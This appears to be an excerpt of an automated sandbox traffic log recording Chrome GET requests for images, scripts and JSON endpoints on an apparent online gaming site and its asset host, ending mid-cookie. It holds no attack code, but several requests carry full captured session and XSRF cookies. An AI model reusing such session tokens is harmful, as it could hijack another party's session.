Source: global trafficHTTP traffic detected: GET /images_plus/about/nav_icon.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=1736392866Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/p-img1.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/p-img2.jpg HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/91_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/egame_unite.js?ver=1723802385 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right3.jpg HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/61_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/202_egame_logo.png?ver=1673549406 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right2.jpg HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
Source: global trafficHTTP traffic detected: GET /getcatlist/224 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=224&page=1&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/en/224_egame_icon.png?1736725697344 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://b45032.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right1.jpg HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/76_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/173_egame_logo.png?ver=1698829779 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/271_egame_logo.png?ver=1605689921 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/218_egame_logo.png?ver=1692209012 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/about/nav_icon.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/p-img1.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/91_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gdcode_1736725694 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/p-img2.jpg HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right3.jpg HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/217_egame_logo.png?ver=1692209012 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/221_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/61_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/202_egame_logo.png?ver=1673549406 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right2.jpg HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; 